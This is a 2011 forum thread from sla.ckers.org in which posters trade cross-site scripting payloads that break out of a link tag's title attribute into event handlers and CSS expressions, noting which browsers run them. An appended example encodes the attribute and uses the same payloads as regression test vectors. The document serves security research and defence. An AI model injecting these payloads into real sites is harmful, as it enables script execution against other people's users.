Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
XSS in <link type="application/rss+xml">
Posted by: ethicalhack3r
Date: May 18, 2011 09:31AM

Hi,

I have come across the following XSS which I can't seem to get to execute. The injection is within the 'title' element of the 'link' tag.

After some reading up, rel="alternative" with type="application/rss+xml", will take an action if the user agent is a 'rss+xml' application.

So, from my understanding the XSS would only execute if the page was accessed via such an application.

Here is the tag without injection:

<link rel="alternate" type="application/rss+xml" title="Search Results | News Feed" href="feeds/newsfeed.php" />

The tag with injection:

<link rel="alternate" type="application/rss+xml" title="tt" onmousemove="alert(1)" whatever=" Search Results | News Feed" href="feeds/newsfeed.php" />

The payload used:

tt" onmousemove="alert(1)" whatever="

Is there any way to get the above to execute injected javascript?

Thanks,
Ryan

Re: XSS in <link type="application/rss+xml">
Posted by: Gareth Heyes
Date: May 18, 2011 10:20AM

"style="xss:expression(alert(1))"x="

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: XSS in <link type="application/rss+xml">
Posted by: ethicalhack3r
Date: May 18, 2011 12:02PM

Hi Gareth,

That payload doesn't execute in my FF4.

<link rel="alternate" type="application/rss+xml" title="" style="xss:expression(alert(1))" x=" Search Results | News Feed" href="feeds/newsfeed.php" />

Thanks for the reply,
Ryan

Re: XSS in <link type="application/rss+xml">
Posted by: Anonymous User
Date: May 18, 2011 12:43PM

Expression is IE only (IE7 doc mode)

This works on Opera:
<link rel="alternate" type="application/rss+xml" title=""style="display:block;border:100px solid red"onmouseover=alert(1)// href="feeds/newsfeed.php" />

Re: XSS in <link type="application/rss+xml">
Posted by: ethicalhack3r
Date: May 18, 2011 12:55PM

Ah! Thanks for the info mario!

That payload did execute correctly within Opera.

I thought that maybe the 'type' element value was stopping the XSS from being executed.

I will keep playing with FF4, see if I can come up with something.

Re: XSS in <link type="application/rss+xml">
Posted by: Anonymous User
Date: May 18, 2011 01:05PM

If you find something in FF4+ it'd be beyond awesome ;)



Edited 1 time(s). Last edit at 05/18/2011 02:10PM by .mario.

Re: XSS in <link type="application/rss+xml">
Posted by: Gareth Heyes
Date: May 18, 2011 01:26PM

This also works on IE9
<link onload=alert(1) href="http://hackvertor.co.uk/css/styles.css" rel="stylesheet" type="text/css" />

<link onreadystatechange=alert(1) href="http://hackvertor.co.uk/css/styles.css" rel="stylesheet" type="text/css" />


Re: XSS in <link type="application/rss+xml">
Posted by: ethicalhack3r
Date: May 18, 2011 05:25PM

Just came across this old post which seems to discuss this same injection:
http://sla.ckers.org/forum/read.php?2,36227


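Every payload in this thread depends on the request value reaching title="..." without attribute encoding, so a double quote closes the attribute. The following is an added example, not code from any poster: it renders the thread's link tag with and without encoding and lists the attributes a parser would see. The function names and the simplified scanner are assumptions made for illustration.

```javascript
// Added example (not from the thread). The template mirrors the <link> tag quoted
// in the first post; all function names are hypothetical.
const EXPECTED = ['rel', 'type', 'title', 'href'];

// Vulnerable pattern: the request value is concatenated into title="..." as-is.
function renderRaw(value) {
  return '<link rel="alternate" type="application/rss+xml" title="' + value +
         ' Search Results | News Feed" href="feeds/newsfeed.php" />';
}

// Attribute-context output encoding. '&' is handled in the same single pass, so
// nothing is double-encoded and an encoded quote can never close the attribute.
const ENTITIES = { '&': '&amp;', '"': '&quot;', "'": '&#39;', '<': '&lt;', '>': '&gt;' };
function encodeAttr(value) {
  return String(value).replace(/[&"'<>]/g, (ch) => ENTITIES[ch]);
}

function renderEncoded(value) {
  return renderRaw(encodeAttr(value));
}

// Simplified start-tag scanner: name, then optional ="..." / ='...' / unquoted value.
// Like a browser, it needs no whitespace between attributes, so title=""style=...
// still yields a separate style attribute.
function attributeNames(tag) {
  const body = tag.replace(/^<link\b/i, '').replace(/\/?>\s*$/, '');
  const re = /([^\s\/>=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  const names = [];
  for (const m of body.matchAll(re)) names.push(m[1].toLowerCase());
  return names;
}

// Attributes present in the rendered tag that the template never declared.
function injectedAttributes(tag) {
  return attributeNames(tag).filter((name) => !EXPECTED.includes(name));
}

// Payloads quoted in the thread, used here only as test vectors.
const THREAD_PAYLOADS = [
  'tt" onmousemove="alert(1)" whatever="',
  '"style="xss:expression(alert(1))"x="',
  '"style="display:block;border:100px solid red"onmouseover=alert(1)//',
];

for (const p of THREAD_PAYLOADS) {
  console.log(JSON.stringify(injectedAttributes(renderRaw(p))), '->',
              JSON.stringify(injectedAttributes(renderEncoded(p))));
}
```

With encoding applied, each test vector stays inside the title value and the tag keeps only its four declared attributes, which makes the check usable as a regression test for the template.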
